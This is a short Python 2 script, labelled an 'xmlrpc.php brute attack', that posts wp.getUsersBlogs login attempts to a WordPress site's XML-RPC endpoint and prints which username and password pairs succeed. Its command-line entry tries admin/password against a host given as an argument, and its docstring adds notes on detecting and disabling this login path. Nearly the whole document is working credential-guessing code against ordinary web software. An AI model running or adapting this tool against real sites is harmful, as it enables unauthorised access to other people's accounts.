#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys
import httplib
from urllib2 import urlopen, HTTPError, URLError
from xml.dom.minidom import parseString
from xml.parsers.expat import ExpatError
def brute(host, port, username, password):
    """Submit one XML-RPC login attempt to a WordPress site and report it.

    A ``wp.getUsersBlogs`` methodCall carrying *username* and *password* is
    POSTed to ``http://<host>:<port>/xmlrpc.php`` with a 10 second timeout.
    On the server each call shows up as a single POST to /xmlrpc.php naming
    wp.getUsersBlogs; a run of such requests from one client is the pattern
    to rate-limit or alert on, and disabling XML-RPC where it is unused
    removes this login path.

    The credentials are sent over plain HTTP and echoed to stdout.

    Returns:
        True when the first <member> of the reply holds a <boolean> whose
        text is 0 or 1, False in every other handled case (HTTP error,
        unreachable host, non-200 status, unparsable body, no boolean).

    Raises:
        IndexError: the reply parsed as XML but has no <member> element.
        ValueError: the <boolean> text is not an integer.
    """
    request_body = """<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>%s</value></param>
<param><value>%s</value></param>
</params>
</methodCall>""" % (username, password)
    endpoint = "http://%s:%s/xmlrpc.php" % (host, port)

    # Passing data= makes urlopen issue a POST.
    try:
        reply = urlopen(endpoint, data=request_body, timeout=10)
    except HTTPError:
        # Any HTTP error status is reported with this one message.
        print("[-] 404 not found.")
        return False
    except URLError:
        print("[-] host is down.")
        return False
    except (httplib.BadStatusLine, httplib.IncompleteRead):
        # Original notes: BadStatusLine seen with www.metasploit.com,
        # IncompleteRead with hao123.com.
        return False

    # Anything other than 200 (for example a 302) is treated as "no endpoint".
    if reply.getcode() != 200:
        print("[-] Wordpress xmlrpc.php does not exist.")
        return False

    raw_xml = reply.read()
    try:
        document = parseString(raw_xml)
    except ExpatError:
        # A 200 body that is not XML is taken to mean xmlrpc.php is absent.
        print("[-] Wordpress xmlrpc.php does not exist.")
        return False

    # Per the original notes the first <member> distinguishes the outcome:
    # a fault (code 403) carries no <boolean>, a successful login does.
    first_member = document.getElementsByTagName('member')[0]
    flags = first_member.getElementsByTagName('boolean')
    if not flags:
        print("[-] failed : [ %s:%s ]" % (username, password))
        return False

    flag_text = flags[0].toxml()
    flag_text = flag_text.replace('<boolean>', '').replace('</boolean>', '')
    flag = int(flag_text)
    if flag == 0:
        print("[+] success: [ %s:%s ] " % (username, password))
        return True
    if flag == 1:
        print("[+] success: [ %s:%s ] - A" % (username, password))
        return True
    print("[-] failed : [ %s:%s ]" % (username, password))
    return False
if __name__ == "__main__":
    # Exactly one argument (the host) is expected; port, user name and
    # password are the fixed values '80', 'admin' and 'password'.
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        print("brute.py www.example.com (default port: 80)")
    else:
        brute(cli_args[0], '80', 'admin', 'password')
xmlrpc.php brute attack